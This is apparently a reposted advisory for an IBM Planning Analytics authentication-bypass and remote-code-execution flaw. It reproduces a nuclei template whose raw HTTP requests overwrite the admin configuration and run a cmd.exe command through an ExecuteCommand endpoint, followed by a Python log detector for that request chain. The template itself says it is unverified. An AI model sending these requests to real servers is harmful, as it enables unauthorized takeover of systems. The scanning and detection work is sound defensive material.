IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

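Vulnerability Information

Vulnerability name: IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2019-4716

Vulnerability type: Authorization bypass

Severity: Critical

Description: IBM Planning Analytics is enterprise planning and analytics software widely used for financial planning, budgeting and forecasting. It supports advanced data manipulation and analysis through TM1 scripts and is an important component of enterprise decision-support systems.

The vulnerability exists in IBM Planning Analytics versions 2.0.0 through 2.0.8. Because of a configuration overwrite caused by unauthenticated access, an attacker can bypass the authentication mechanism, log in as 'admin', and execute arbitrary code through TM1 scripts, gaining root or SYSTEM privileges. The root cause is that the system fails to verify user identity correctly and allows unauthenticated users to modify critical configuration parameters.

The security risk is extremely high: an attacker needs no valid credentials to exploit the vulnerability, achieve remote code execution and take full control of the system. This can lead to disclosure of sensitive data and can also be used to launch further attacks, such as lateral movement inside the internal network or malware deployment. Because exploitation requires no user interaction and can be automated, the threat to affected systems is especially severe.

Vendor: IBM

Product: IBM Planning Analytics

Affected versions: 2.0.0 <= version <= 2.0.8

Source: https://github.com/projectdiscovery/nuclei-templates/blob/0e41b71c5a69d0aa789f624ab9c61db3bdbce209/http%2Fcves%2F2019%2FCVE-2019-4716.yaml

Type: projectdiscovery/nuclei-templates:github issues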

PoC Details


id: CVE-2019-4716

info:
  name: IBM Planning Analytics 2.0.0-2.0.8 - Authentication Bypass & Remote Code Execution
  author: pranjal
  severity: critical
  description: |
    IBM Planning Analytics versions 2.0.0 through 2.0.8 contain a configuration overwrite caused by unauthenticated access,
    letting attackers login as 'admin' and execute code as root or SYSTEM via TM1 scripting. The vulnerability allows
    authentication bypass and remote code execution without valid credentials.
  impact: |
    An attacker can exploit this vulnerability to gain administrative access and execute arbitrary code with elevated privileges.
  remediation: |
    Upgrade IBM Planning Analytics to version 2.0.9 or later to fix the authentication bypass and remote code execution vulnerability.
  reference:
    - https://packetstormsecurity.com/files/156953/IBM-Cognos-TM1-IBM-Planning-Analytics-Server-Configuration-Overwrite-Code-Execution.html
    - https://seclists.org/fulldisclosure/2020/Mar/44
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-4716
    cwe-id: CWE-287
    epss-score: 0.98765
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:ibm:planning_analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: ibm
    product: planning_analytics
    verified: false
    # Debug Information for Validation
    debug-info: |
      To validate this template:
      1. Set up IBM Planning Analytics 2.0.8 (vulnerable version)
      2. Run: nuclei -t CVE-2019-4716.yaml -u http://target:port -debug
      3. Expected debug output should show:
         - Step 1: Configuration endpoint accessible (200 OK)
         - Step 2: Configuration overwrite successful (200/201)
         - Step 3: RCE command execution successful with randstr in response
      4. Alternative: Use TM1 REST API detection method
    test-environment: |
      Docker setup for testing:
      - IBM Planning Analytics 2.0.8 container
      - Expose port 9510 (default TM1 port)
      - Enable TM1 REST API
      - Disable authentication for testing
  tags: cve,cve2019,ibm,planning-analytics,tm1,rce,auth-bypass,packetstorm

flow: http(1) && http(2) && http(3)

http:
  # Step 1: Check if IBM Planning Analytics/TM1 is running
  - raw:
      - |
        GET /tm1/api/v1/Configuration HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "adminhost") || contains(tolower(body), "adminport") || contains(tolower(body), "configuration")'
        condition: and
        internal: true

  # Step 2: Authentication bypass via configuration overwrite
  - raw:
      - |
        POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "AdminHost": "{{randstr}}",
          "AdminPort": 1234
        }

    matchers:
      - type: status
        status:
          - 200
          - 201
        internal: true

  # Step 3: RCE via TM1 scripting - Execute command to verify admin access
  - raw:
      - |
        POST /tm1/api/v1/ExecuteCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "Command": "ExecuteProcess('cmd.exe', '/c echo {{randstr}}')"
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 201

      - type: regex
        regex:
          - "success|executed|completed|{{randstr}}"
        part: body

  # Alternative detection method for TM1 REST API endpoints
  - raw:
      - |
        GET /tm1/api/v1/Processes HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "processes|tm1|planning"
        part: body

      - type: word
        words:
          - "IBM"
          - "Planning"
          - "Analytics"
        part: body
        condition: or
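
The detection-side view of the three chained requests in the template, as an added example that is not part of the original template or of the nuclei-templates project: it walks an access log and reports clients that received a success status on each step, in order, without an authenticated user. It assumes the server sits behind a reverse proxy writing Combined Log Format and that a `-` in the user field means no authenticated user; the function names and the sample log lines are constructed for illustration.

```python
import re

# (method, path, accepted statuses) for the template's three chained steps.
STEPS = [
    ("GET", "/tm1/api/v1/Configuration", {200}),
    ("POST", "/tm1/api/v1/Configuration/AdminHost", {200, 201}),
    ("POST", "/tm1/api/v1/ExecuteCommand", {200, 201}),
]

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_chains(lines):
    """Map client IP -> number of template steps seen in order, unauthenticated."""
    progress = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        ip, user, method, target, status = m.groups()
        if user != "-":
            continue  # assumption: "-" means no authenticated user
        step = progress.get(ip, 0)
        if step == len(STEPS):
            continue  # chain already complete for this client
        want_method, want_path, ok_status = STEPS[step]
        path = target.split("?", 1)[0]  # ignore any query string
        if (method, path) == (want_method, want_path) and int(status) in ok_status:
            progress[ip] = step + 1
    return progress


def completed_chains(lines):
    """Clients that succeeded on all three steps: handle as an incident."""
    return sorted(ip for ip, n in find_chains(lines).items() if n == len(STEPS))


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2025:10:00:01 +0000] "GET /tm1/api/v1/Configuration HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - alice [18/Jul/2025:10:00:02 +0000] "GET /tm1/api/v1/Configuration HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Jul/2025:10:00:03 +0000] "POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Jul/2025:10:00:04 +0000] "POST /tm1/api/v1/ExecuteCommand HTTP/1.1" 401 0 "-" "curl/8.0"',
    '192.0.2.10 - - [18/Jul/2025:10:00:05 +0000] "POST /tm1/api/v1/ExecuteCommand HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_LOG))
    print(completed_chains(SAMPLE_LOG))
```

A client that stops at step 1 or 2 still appears in `find_chains` with a partial count, which is useful for spotting scans against hosts already upgraded to 2.0.9 or later.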


http://example.com/2025/07/18/github_913066187/
Author: lianccc
Published: July 18, 2025